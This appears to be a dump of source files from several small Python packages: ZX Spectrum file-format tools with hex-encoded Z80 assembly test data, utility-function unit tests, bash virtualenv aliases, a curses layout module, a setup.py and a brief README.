b"\x41\x44\x44\x20\x48\x4C\x2C\x44\x45\x0A\x34\x30\x36\x33\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x41\x2C\x28\x48\x4C\x29\x0A"
b"\x34\x30\x36\x34\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28"
b"\x53\x45\x43\x29\x2C\x41\x0A\x34\x30\x36\x35\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x49\x4E\x43\x20\x48\x4C\x0A\x34\x30\x36\x36\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x41\x2C\x28\x48\x4C\x29\x0A"
b"\x34\x30\x36\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28"
b"\x54\x52\x43\x29\x2C\x41\x0A\x34\x30\x36\x38\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x4A\x50\x20\x4C\x4F\x41\x32\x0A\x34\x30\x36\x39\x30"
b"\x20\x4E\x45\x58\x54\x46\x20\x4C\x44\x20\x44\x45\x2C\x28\x50\x44"
b"\x45\x29\x0A\x34\x30\x37\x30\x30\x20\x20\x20\x20\x20\x20\x20\x4C"
b"\x44\x20\x48\x4C\x2C\x31\x36\x0A\x34\x30\x37\x31\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x41\x44\x44\x20\x48\x4C\x2C\x44\x45\x0A\x34\x30"
b"\x37\x32\x30\x20\x20\x20\x20\x20\x20\x20\x45\x58\x20\x44\x45\x2C"
b"\x48\x4C\x0A\x34\x30\x37\x33\x30\x20\x20\x20\x20\x20\x20\x20\x4C"
b"\x44\x20\x42\x43\x2C\x28\x50\x42\x43\x29\x0A\x34\x30\x37\x34\x30"
b"\x20\x20\x20\x20\x20\x20\x20\x44\x4A\x4E\x5A\x20\x46\x46\x32\x0A"
b"\x34\x30\x37\x35\x30\x20\x4E\x46\x49\x4C\x45\x20\x43\x41\x4C\x4C"
b"\x20\x4E\x45\x57\x53\x48\x0A\x34\x30\x37\x36\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x4D\x53\x47\x32\x0A\x34\x30"
b"\x37\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x43\x2C"
b"\x4D\x53\x47\x33\x2D\x4D\x53\x47\x32\x0A\x34\x30\x37\x38\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x23\x32\x30\x33\x43"
b"\x0A\x34\x30\x37\x38\x31\x20\x20\x20\x20\x20\x20\x20\x43\x41\x4C"
b"\x4C\x20\x42\x45\x45\x50\x0A\x34\x30\x37\x38\x32\x20\x20\x20\x20"
b"\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x4D\x53\x47\x33\x0A\x34\x30"
b"\x37\x38\x33\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x43\x2C"
b"\x54\x52\x43\x2D\x4D\x53\x47\x33\x0A\x34\x30\x37\x38\x34\x20\x20"
b"\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x23\x32\x30\x33\x43\x0A"
b"\x34\x30\x38\x30\x30\x20\x43\x41\x4C\x4C\x20\x50\x41\x55\x53\x3A"
b"\x43\x41\x4C\x4C\x20\x53\x54\x41\x4E\x44\x0A\x34\x30\x38\x31\x30"
b"\x20\x20\x20\x20\x20\x20\x20\x4A\x50\x20\x4C\x4F\x41\x44\x0A\x34"
b"\x30\x38\x32\x30\x20\x50\x41\x55\x53\x20\x20\x58\x4F\x52\x20\x41"
b"\x0A\x34\x30\x38\x33\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20"
b"\x28\x32\x33\x35\x36\x30\x29\x2C\x41\x0A\x34\x30\x38\x34\x30\x20"
b"\x50\x41\x32\x20\x20\x20\x4C\x44\x20\x41\x2C\x28\x32\x33\x35\x36"
b"\x30\x29\x0A\x34\x30\x38\x35\x30\x20\x20\x20\x20\x20\x20\x20\x43"
b"\x50\x20\x30\x0A\x34\x30\x38\x36\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x52\x45\x54\x20\x4E\x5A\x0A\x34\x30\x38\x37\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x4A\x52\x20\x50\x41\x32\x0A\x34\x30\x38\x38\x30\x20"
b"\x42\x45\x45\x50\x20\x20\x4C\x44\x20\x44\x45\x2C\x23\x30\x31\x30"
b"\x35\x0A\x34\x30\x38\x39\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44"
b"\x20\x48\x4C\x2C\x23\x30\x36\x36\x36\x0A\x34\x30\x39\x30\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x23\x30\x33\x42\x35"
b"\x0A\x34\x30\x39\x31\x30\x20\x20\x20\x20\x20\x20\x20\x52\x45\x54"
b"\x0A\x34\x30\x39\x32\x30\x20\x4C\x4F\x41\x44\x20\x20\x4C\x44\x20"
b"\x48\x4C\x2C\x32\x32\x35\x36\x30\x0A\x34\x30\x39\x33\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x32\x32\x35\x36\x31"
b"\x0A\x34\x30\x39\x34\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20"
b"\x42\x43\x2C\x37\x33\x36\x0A\x34\x30\x39\x35\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x4C\x44\x20\x28\x48\x4C\x29\x2C\x30\x0A\x34\x30\x39"
b"\x36\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x49\x52\x0A\x34\x30"
b"\x39\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x43\x2C"
b"\x23\x30\x39\x30\x35\x0A\x34\x30\x39\x38\x30\x20\x20\x20\x20\x20"
b"\x20\x20\x4C\x44\x20\x44\x45\x2C\x30\x0A\x34\x30\x39\x39\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x48\x4C\x2C\x31\x38\x34\x33"
b"\x32\x0A\x34\x31\x30\x30\x30\x20\x20\x20\x20\x20\x20\x20\x43\x41"
b"\x4C\x4C\x20\x31\x35\x36\x33\x35\x0A\x34\x31\x30\x31\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x4A\x50\x20\x46\x46\x49\x4C\x45\x0A\x34\x31"
b"\x30\x32\x30\x20\x4C\x4F\x41\x32\x20\x20\x4C\x44\x20\x41\x2C\x28"
b"\x53\x45\x43\x29\x0A\x34\x31\x30\x33\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x4C\x44\x20\x45\x2C\x41\x0A\x34\x31\x30\x34\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x4C\x44\x20\x41\x2C\x28\x54\x52\x43\x29\x0A\x34"
b"\x31\x30\x35\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x2C"
b"\x41\x0A\x34\x31\x30\x36\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44"
b"\x20\x42\x43\x2C\x23\x32\x36\x30\x35\x0A\x34\x31\x30\x37\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x48\x4C\x2C\x33\x30\x30\x30"
b"\x30\x0A\x34\x31\x30\x38\x30\x20\x20\x20\x20\x20\x20\x20\x43\x41"
b"\x4C\x4C\x20\x31\x35\x36\x33\x35\x0A\x34\x31\x30\x39\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x4A\x50\x20\x33\x31\x36\x39\x33\x0A\x36\x30"
b"\x30\x30\x30\x20\x41\x44\x52\x53\x48\x20\x45\x51\x55\x20\x33\x30"
b"\x30\x30\x30\x0A\x36\x30\x30\x31\x30\x20\x4D\x53\x47\x31\x20\x20"
b"\x44\x45\x46\x42\x20\x32\x32\x2C\x30\x2C\x30\x2C\x31\x37\x2C\x30"
b"\x0A\x36\x30\x30\x32\x30\x20\x20\x20\x20\x20\x20\x20\x44\x45\x46"
b"\x42\x20\x31\x36\x2C\x37\x0A\x36\x30\x30\x33\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x46\x4F\x4E\x54\x20\x45\x44\x49\x54\x4F\x52\x20\x62"
b"\x79\x20\x4C\x79\x61\x22\x0A\x36\x30\x30\x34\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x64\x76\x69\x6E\x73\x6B\x79\x20\x4B\x69\x72\x69\x6C"
b"\x6C\x22\x0A\x36\x30\x30\x35\x30\x20\x46\x4E\x41\x4D\x45\x20\x44"
b"\x45\x46\x4D\x20\x22\x65\x64\x69\x74\x6F\x72\x20\x20\x22\x0A\x36"
b"\x30\x30\x36\x30\x20\x50\x44\x45\x20\x20\x20\x44\x45\x46\x57\x20"
b"\x30\x0A\x36\x30\x30\x37\x30\x20\x50\x42\x43\x20\x20\x20\x44\x45"
b"\x46\x57\x20\x30\x0A\x36\x30\x30\x38\x30\x20\x4D\x53\x47\x32\x20"
b"\x20\x44\x45\x46\x42\x20\x32\x32\x2C\x35\x2C\x30\x2C\x31\x37\x2C"
b"\x30\x0A\x36\x30\x30\x39\x30\x20\x44\x45\x46\x42\x20\x31\x36\x2C"
b"\x37\x2C\x31\x39\x2C\x31\x0A\x36\x30\x31\x30\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x46\x69\x6C\x65\x20\x27\x65\x64\x69\x74\x6F\x72\x20"
b"\x20\x3C\x45\x3E\x27\x22\x0A\x36\x30\x31\x31\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x20\x6E\x6F\x74\x20\x66\x6F\x75\x6E\x64\x22\x0A\x36"
b"\x30\x31\x32\x30\x20\x4D\x53\x47\x33\x20\x20\x44\x45\x46\x42\x20"
b"\x32\x32\x2C\x36\x2C\x30\x2C\x31\x37\x2C\x30\x0A\x36\x30\x31\x32"
b"\x35\x20\x20\x20\x20\x20\x20\x20\x44\x45\x46\x42\x20\x31\x36\x2C"
b"\x37\x2C\x31\x39\x2C\x30\x0A\x36\x30\x31\x33\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x50\x52\x45\x53\x53\x20\x41\x4E\x59\x20\x4B\x45\x59"
b"\x20\x46\x4F\x52\x20\x22\x0A\x36\x30\x31\x34\x30\x20\x44\x45\x46"
b"\x4D\x20\x22\x52\x45\x4C\x4F\x41\x44\x20\x46\x49\x4C\x45\x22\x0A"
b"\x36\x30\x31\x36\x30\x20\x54\x52\x43\x20\x20\x20\x44\x45\x46\x42"
b"\x20\x30\x0A\x36\x30\x31\x37\x30\x20\x53\x45\x43\x20\x20\x20\x44"
b"\x45\x46\x42\x20\x30\x0A\x36\x30\x31\x38\x30\x20\x45\x4E\x44\x32"
b"\x20\x20\x4E\x4F\x50\x0A"
)
if __name__ == '__main__':
unittest.main()
|
zxtools
|
/zxtools-1.0.22.tar.gz/zxtools-1.0.22/test/test_zeus2txt.py
|
test_zeus2txt.py
|
#! /usr/bin/env python
# vim: set fileencoding=utf-8 :
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Kirill V. Lyadvinsky
# http://www.codeatcpp.com
#
# Licensed under the BSD 3-Clause license.
# See LICENSE file in the project root for full license information.
#
""" hobeta.py tests """
import os
import io
import struct
import unittest
import tempfile
from collections import namedtuple
from zxtools import hobeta
class TestHobeta(unittest.TestCase):
def test_args_parser(self):
with self.assertRaises(SystemExit):
hobeta.parse_args(("-h", "-v"))
with self.assertRaises(SystemExit):
hobeta.parse_args(())
temp_in_file = tempfile.mkstemp()[1]
input_file = open(temp_in_file, "w")
input_file.close()
temp_out_file = tempfile.mkstemp()[1]
try:
args = hobeta.parse_args(("info", temp_in_file))
self.assertEqual(args.func, hobeta.show_info)
args.hobeta_file.close()
args = hobeta.parse_args(("strip", temp_in_file, temp_out_file))
self.assertEqual(args.func, hobeta.strip_header)
args.hobeta_file.close()
args.output_file.close()
finally:
os.remove(temp_in_file)
os.remove(temp_out_file)
def test_checksum(self):
data = b'F.load.AC\x00\x80\xf9\x06\x00\x07'
self.assertEqual(hobeta.calc_checksum(data), 20661)
def test_format_size(self):
header_len = struct.calcsize(hobeta.HEADER_FMT)
self.assertEqual(header_len, 17)
def test_format(self):
data = b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41" \
b"\x43\x00\x80\xF9\x06\x00\x07\xB5\x50"
record = hobeta.Header._make(struct.unpack_from(hobeta.HEADER_FMT,
data))
self.assertEqual(record.filename, b"F.load.A")
self.assertEqual(record.filetype, ord('C'))
self.assertEqual(record.start, 32768)
self.assertEqual(record.length, 1785)
self.assertEqual(record.first_sector, 0)
self.assertEqual(record.occupied_sectors, 7)
self.assertEqual(record.check_sum, 20661)
def test_parse_info(self):
test_file = io.BytesIO(b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41"
b"\x43\x00\x80\xF9\x06\x00\x07\xB5"
b"\x50\x00\x00\x3B\x20\x4C\x4F\x41"
b"\x44\x45\x52\x20\x66\x6F\x72\x20")
header, crc = hobeta.parse_info(test_file)
self.assertEqual(header.filename, b"F.load.A")
self.assertEqual(header.filetype, ord('C'))
self.assertEqual(header.start, 32768)
self.assertEqual(header.length, 1785)
self.assertEqual(header.first_sector, 0)
self.assertEqual(header.occupied_sectors, 7)
self.assertEqual(header.check_sum, 20661)
self.assertEqual(header.check_sum, crc)
def test_parse_info2(self):
test_file = io.BytesIO(b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41"
b"\x43\x00\x80\x02\x00\x00\x07\xB5"
b"\x50\x00\x00\x3B\x20\x4C\x4F\x41"
b"\x44\x45\x52\x20\x66\x6F\x72\x20")
header, crc = hobeta.parse_info(test_file)
self.assertEqual(header.filename, b"F.load.A")
self.assertEqual(header.filetype, ord('C'))
self.assertEqual(header.start, 32768)
self.assertEqual(header.length, 2)
self.assertEqual(header.first_sector, 0)
self.assertEqual(header.occupied_sectors, 7)
self.assertEqual(header.check_sum, 20661)
self.assertNotEqual(header.check_sum, crc)
@staticmethod
def strip_header(test_input_file, ignore_header_info):
temp_output_path = tempfile.mkstemp()[1]
temp_output_file = open(temp_output_path, "wb")
args = namedtuple('Args', "hobeta_file output_file ignore_header")
parsed_args = args(test_input_file,
temp_output_file,
ignore_header_info)
copied_bytes = hobeta.strip_header(parsed_args)
return temp_output_path, copied_bytes
def test_strip_header1(self):
test_input_file = io.BytesIO(b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41"
b"\x43\x00\x80\xF9\x06\x00\x07\xB5"
b"\x50\x00\x00\x3B\x20\x4C\x4F\x41"
b"\x44\x45\x52\x20\x66\x6F\x72")
temp_output_path, bytes_count = self.strip_header(
test_input_file, True)
temp_output_file = open(temp_output_path, "rb")
temp_output_file.seek(0, os.SEEK_END)
try:
self.assertEqual(temp_output_file.tell(), 14)
self.assertEqual(bytes_count, 14)
finally:
temp_output_file.close()
os.remove(temp_output_path)
def test_strip_header2(self):
test_input_file = io.BytesIO(b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41"
b"\x43\x00\x80\xF9\x06\x00\x07\xB5"
b"\x50\x00\x00\x3B\x20\x4C\x4F\x41"
b"\x44\x45\x52\x20\x66\x6F\x72\x20\x20")
temp_output_path, bytes_count = self.strip_header(
test_input_file, False)
temp_output_file = open(temp_output_path, "rb")
temp_output_file.seek(0, os.SEEK_END)
try:
self.assertEqual(temp_output_file.tell(), 16)
self.assertEqual(bytes_count, 16)
finally:
temp_output_file.close()
os.remove(temp_output_path)
def test_strip_header3(self):
test_input_file = io.BytesIO(b"\x46\x2E\x6C\x6F\x61\x64\x2E\x41"
b"\x43\x00\x80\x0A\x00\x00\x07\xB5"
b"\x50\x00\x00\x3B\x20\x4C\x4F\x41"
b"\x44\x45\x52\x20\x66\x6F\x72\x20")
temp_output_path, bytes_count = self.strip_header(
test_input_file, False)
temp_output_file = open(temp_output_path, "rb")
temp_output_file.seek(0, os.SEEK_END)
try:
self.assertEqual(temp_output_file.tell(), 10)
self.assertEqual(bytes_count, 10)
finally:
temp_output_file.close()
os.remove(temp_output_path)
if __name__ == '__main__':
unittest.main()
|
zxtools
|
/zxtools-1.0.22.tar.gz/zxtools-1.0.22/test/test_hobeta.py
|
test_hobeta.py
|
#! /usr/bin/env python
# vim: set fileencoding=utf-8 :
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Kirill V. Lyadvinsky
# http://www.codeatcpp.com
#
# Licensed under the BSD 3-Clause license.
# See LICENSE file in the project root for full license information.
#
""" trdos.py tests """
import unittest
import struct
from zxtools import trdos
class TestTRDos(unittest.TestCase):
def test_fat_format(self):
data = b"filenameC\x00\x80\xf9\x06\x07\xC1\x01"
record = trdos.FATRecord._make(
struct.unpack_from(trdos.FAT_RECORD_FMT, data))
self.assertEqual(record.filename, b"filename")
self.assertEqual(record.filetype, ord("C"))
self.assertEqual(record.start, 32768)
self.assertEqual(record.length, 1785)
self.assertEqual(record.occupied_sectors, 0x07)
self.assertEqual(record.first_sector, 0xC1)
self.assertEqual(record.first_track, 0x01)
if __name__ == '__main__':
unittest.main()
|
zxtools
|
/zxtools-1.0.22.tar.gz/zxtools-1.0.22/test/test_trdos.py
|
test_trdos.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
from datetime import datetime
from zxutils.pytime import str_to_date, ts_to_date
def test_ts_to_date():
assert ts_to_date(1574232324) is not None
assert ts_to_date(1574232316000) is not None
def test_text_to_date():
assert str_to_date("2017-07-09") == datetime(2017, 7, 9)
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pytime.py
|
test_pytime.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/21
# Desc:
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pyspider.py
|
test_pyspider.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
from zxutils.pyimg import download_img, img_to_base64
def test_download_img():
test_img_url = "https://file.cibfintech.com/file/M00/00/5C/CiADdV0S6BiAGT-bAAKutEZzfC8967.jpg"
filename, status = download_img(test_img_url)
assert status == "success"
def test_img_to_base64():
test_img_filename = "CiADdV0S6BiAGT-bAAKutEZzfC8967.jpg"
img_to_base64(test_img_filename)
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pyimg.py
|
test_pyimg.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
from zxutils.pystr import bytes_to_str, str_to_bytes
def test_str_to_bytes():
assert str_to_bytes("zx") == b'zx'
assert str_to_bytes("一", encoding="gbk") == b'\xd2\xbb'
assert str_to_bytes("一", encoding="gb2312") == b'\xd2\xbb'
def test_bytes_to_str():
assert bytes_to_str(b'hello') == "hello"
assert bytes_to_str(b'\xd2\xbb', encoding="gb2312") == "一"
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pystr.py
|
test_pystr.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
from zxutils.pyencrypt import str_to_md5, bytes_to_base64, base64_to_bytes
def test_build_hash():
assert str_to_md5("hello") == "5d41402abc4b2a76b9719d911017c592"
def test_bytes_to_base64():
assert bytes_to_base64(b'hello') == 'aGVsbG8='
def test_base64_to_bytes():
assert base64_to_bytes("aGVsbG8=") == b'hello'
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pyencrypt.py
|
test_pyencrypt.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
from zxutils.pyurl import build_url, get_page, unpack_url
def test_get_page():
test_url = "https://ss0.bdstatic.com/5aV1bjqh_Q23odCf/static/superlanding/img/logo_top.png"
assert get_page(test_url) is not None
def test_build_url():
base_url = "https://www.example.com"
assert build_url(base_url, {"name": "zx"}) == "https://www.example.com?name=zx"
def test_unpack_url():
test_url = "https://www.example.com?name=zx&age=11"
assert unpack_url(test_url) == ("https://www.example.com", {"name": "zx", "age": 11})
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pyurl.py
|
test_pyurl.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/test_pyfile.py
|
test_pyfile.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <zxyful@gmail.com>
# Date: 2019/11/20
# Desc:
|
zxutils
|
/zxutils-1.0.2-py3-none-any.whl/tests/__init__.py
|
__init__.py
|
#!/bin/bash
if ! command -v python &> /dev/null
then
echo "python not found, (python-is-python3 not installed?)"
else
python -m zxvcv.cmdutil.pvenv.remove ${@:1}
fi
|
zxvcv.cmdutil
|
/zxvcv.cmdutil-0.5.0-py39-none-any.whl/zxvcv/cmdutil/aliases/unix/venvr.sh
|
venvr.sh
|
#!/bin/bash
if [[ $1 == --help || $1 == "" || $2 == "" ]]; then
echo "Initialize python virtual env"
echo "usage venvi [--help] pyver args"
echo ""
echo "arguments:"
echo " --help show brief help message"
echo " pyver python version which should beused to create virtual environment"
echo " args arguments for python script what will create virtual environment"
else
if ! command -v python$1 &> /dev/null
then
echo "python$1 not found, 'type venvi --help' to display help page"
else
python$1 -m zxvcv.cmdutil.pvenv.initialize ${@:2}
fi
fi
|
zxvcv.cmdutil
|
/zxvcv.cmdutil-0.5.0-py39-none-any.whl/zxvcv/cmdutil/aliases/unix/venvi.sh
|
venvi.sh
|
#!/bin/bash
if ! command -v python &> /dev/null
then
echo "python not found, (python-is-python3 not installed?)"
else
python -m zxvcv.cmdutil.pvenv.list ${@:1}
fi
|
zxvcv.cmdutil
|
/zxvcv.cmdutil-0.5.0-py39-none-any.whl/zxvcv/cmdutil/aliases/unix/venvl.sh
|
venvl.sh
|
#!/bin/bash
if [[ $1 == --help || $1 == "" ]]; then
echo "Activate python virtual env"
echo "usage venva [--help] name"
echo ""
echo "arguments:"
echo " --help show brief help message"
echo " name anme of python virtual environment to activate"
else
export _VENV_NAME=$1
_venva () {
source ~/pythonvenv/$_VENV_NAME/bin/activate
}
_venva
fi
|
zxvcv.cmdutil
|
/zxvcv.cmdutil-0.5.0-py39-none-any.whl/zxvcv/cmdutil/aliases/unix/venva.sh
|
venva.sh
|
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)
|
zxvcv.util-cli
|
/zxvcv.util_cli-0.2.6-py311-none-any.whl/zxvcv/__init__.py
|
__init__.py
|
import sys
def main(argv=sys.argv[1:]):
print("Hello zxvcv.util-cli!")
if __name__.rpartition(".")[-1] == "__main__":
sys.exit(main(sys.argv[1:]))
|
zxvcv.util-cli
|
/zxvcv.util_cli-0.2.6-py311-none-any.whl/zxvcv/util_cli/__main__.py
|
__main__.py
|
import curses
# NOTE: bug? mypy dont raises [attr-defined] erro
from curses.textpad import rectangle # type: ignore
from queue import SimpleQueue
from textwrap import wrap
from typing import List, Optional
from .datatypes import Margin, Pair, PairF
class Screen:
def __init__(self, screen):
self.scr = screen
self.vscreen = VScreen(self.scr)
def get_position(self) -> Pair:
data = self.scr.getbegyx()
return Pair(data[1], data[0])
def get_size(self) -> Pair:
data = self.scr.getmaxyx()
return Pair(data[1], data[0])
def draw(self) -> None:
self.vscreen.draw()
def recalculate(self) -> None:
self.vscreen.recalculate(
self.get_size() - Pair(2, 0), self.get_position(), Pair(0, 0), Pair(0, 1)
)
class VScreenTextbox:
def __init__(self, screen: Screen, buffer_size: int = 30):
self._screen = screen
self._rawdata: List[str] = []
self._buffer_size = buffer_size
self.data: List[str] = []
self.position = Pair(0, 0)
self.size = Pair(0, 0)
def add_text(self, text: str) -> None:
new_rawdata = [v.strip() for v in text.split("\n")]
# update formatted data
for ln in new_rawdata:
self.data += wrap(ln, self.size.x)
if len(self.data) > self.size.y:
self.data = self.data[len(self.data) - self.size.y :]
# update rawdata
self._rawdata += new_rawdata
if len(self._rawdata) > self._buffer_size:
self._rawdata = self._rawdata[len(self._rawdata) - self._buffer_size :]
def draw(self) -> None:
for i, v in enumerate(self.data):
self._screen.scr.addstr(
self.position.y + i, self.position.x, v, curses.A_NORMAL # type: ignore
)
def recalculate(self, position: Pair, size: Pair) -> None:
self.position = position
# recalculate formatted data
if self.size != size:
self.data = []
for ln in reversed(self._rawdata):
for i, v in enumerate(wrap(ln, self.size.x)):
self.data.insert(i, v)
if len(self.data) > self.size.y:
break
if len(self.data) > self.size.y:
self.data = self.data[len(self.data) - self.size.y :]
self.size = size
class VScreenLogbox(VScreenTextbox):
def __init__(
self, screen: Screen, data_source: Optional[SimpleQueue] = None, buffer_size: int = 30
):
super().__init__(screen, buffer_size)
self._data_source = data_source
def recalculate(self, position: Pair, size: Pair) -> None:
while self._data_source and (not self._data_source.empty()):
self.add_text(self._data_source.get())
super().recalculate(position, size)
class VScreen:
def __init__(
self,
screen: Screen,
sizep: PairF = PairF(1.0, 1.0),
subscreens: List["VScreen"] = [],
margin: Margin = Margin(0, 0, 0, 0),
data: Optional[VScreenTextbox] = None,
draw_borders: bool = False,
):
self.screen = screen
self.subscreens = subscreens
self.position = Pair(0, 0)
self.size = Pair(0, 0)
self._data = data
self.sizep = sizep
self.margin = margin
self.draw_borders = draw_borders
self.border_margin = Margin(1, 1, 1, 1) if draw_borders else Margin(0, 0, 0, 0)
def draw(self):
if self.draw_borders:
# draw bounds for subscreen
try:
rectangle(
self.screen.scr,
self.position.y,
self.position.x,
self.position.y + self.size.y - 1,
self.position.x + self.size.x - 1,
)
# TODO[PP]: exception thrown when drawing in fight bottom char place
# proper handling and correct type of exception should be fixed
except Exception as e:
print(e)
_ = None # TODO[PP]: stupid workarround for bandit check [B110:try_except_pass]
if self.subscreens:
# draw subscreens
for sscreen in self.subscreens:
sscreen.draw()
else:
# draw data
if self._data:
self._data.draw()
def _get_data_position(self) -> Pair:
return Pair(
self.position.x + self.margin.left + self.border_margin.left,
self.position.y + self.margin.top + self.border_margin.top,
)
def _get_data_size(self) -> Pair:
return Pair(
self.size.x
- self.margin.left
- self.margin.right
- self.border_margin.left
- self.border_margin.right,
self.size.y
- self.margin.top
- self.margin.bottom
- self.border_margin.top
- self.border_margin.bottom,
)
def recalculate(
self,
parent_size: Pair,
parent_position: Pair,
position_shift: Pair,
shift_direct: Pair,
):
self.position = parent_position + position_shift
self.size = (self.sizep * parent_size).round()
if self._data:
self._data.recalculate(self._get_data_position(), self._get_data_size())
if self.subscreens:
if shift_direct == Pair(0, 1):
subscreen_shift_direct = Pair(1, 0)
elif shift_direct == Pair(1, 0):
subscreen_shift_direct = Pair(0, 1)
else:
raise ValueError(f"Unsupported shift_direct value '{shift_direct}'")
pshift = Pair(0, 0)
sizep_sum = PairF(0.0, 0.0)
size_sum_test = Pair(0, 0)
size_sum = Pair(0, 0)
directed_one = Pair(1, 1) * shift_direct
for sscreen in self.subscreens:
sscreen.recalculate(
self.size,
self.position,
pshift * shift_direct,
subscreen_shift_direct,
)
sizep_sum += sscreen.sizep
size_sum += sscreen.size
size_sum_test = (sizep_sum * self.size).round()
if size_sum == size_sum_test:
pass
else:
if (size_sum.x < size_sum_test.x) or (size_sum.y < size_sum_test.y):
sscreen.size += directed_one
if self._data:
self._data.recalculate(
self._get_data_position(), self._get_data_size()
)
size_sum += directed_one
elif (size_sum.x > size_sum_test.x) or (size_sum.y > size_sum_test.y):
sscreen.size -= directed_one
if self._data:
self._data.recalculate(
self._get_data_position(), self._get_data_size()
)
size_sum -= directed_one
pshift = pshift + sscreen.size - self.position
|
zxvcv.util-cli
|
/zxvcv.util_cli-0.2.6-py311-none-any.whl/zxvcv/util_cli/vscreens.py
|
vscreens.py
|
import math
from dataclasses import dataclass
from typing import Union
@dataclass
class Pair:
x: int
y: int
def __add__(self, value: "Pair") -> "Pair":
return Pair(self.x + value.x, self.y + value.y)
def __sub__(self, value: "Pair") -> "Pair":
return Pair(self.x - value.x, self.y - value.y)
def __mul__(self, value: "Pair") -> "Pair":
return Pair(self.x * value.x, self.y * value.y)
def __eq__(self, value: object) -> bool:
if not isinstance(value, Pair):
raise NotImplementedError()
return all([self.x == value.x, self.y == value.y])
def __ne__(self, value: object) -> bool:
if not isinstance(value, Pair):
raise NotImplementedError()
return any([self.x != value.x, self.y != value.y])
@dataclass
class PairF:
x: float
y: float
def __add__(self, value: "PairF") -> "PairF":
return PairF(self.x + value.x, self.y + value.y)
def __mul__(self, value: Union["PairF", Pair]) -> "PairF":
return PairF(self.x * value.x, self.y * value.y)
def ceil(self) -> Pair:
return Pair(math.ceil(self.x), math.ceil(self.y))
def round(self) -> Pair:
return Pair(int(round(self.x, 0)), int(round(self.y, 0)))
@dataclass
class Margin:
top: int
bottom: int
left: int
right: int
|
zxvcv.util-cli
|
/zxvcv.util_cli-0.2.6-py311-none-any.whl/zxvcv/util_cli/datatypes.py
|
datatypes.py
|
from distutils.core import setup
setup(
name ='zxwei-nester',
version ='1.0.3',
py_modules =['zxwei-nester'],
author ='xiaowei',
author_email='1649201921@qq.com',
url ='http://zxwei.cc',
description ='A simple printer of nested lists',
)
|
zxwei-nester
|
/zxwei-nester-1.0.3.tar.gz/zxwei-nester-1.0.3/setup.py
|
setup.py
|
# Python 项目模版
## 开发
* 使用 `$ virtualenv venv --python=python3 && source venv/bin/activate` 创建并激活此 `virtualenv`;
* 使用 `$ make install_dev` 或者`$ pip install -e .[dev]` 安装项目依赖
* Coding
## 静态检查
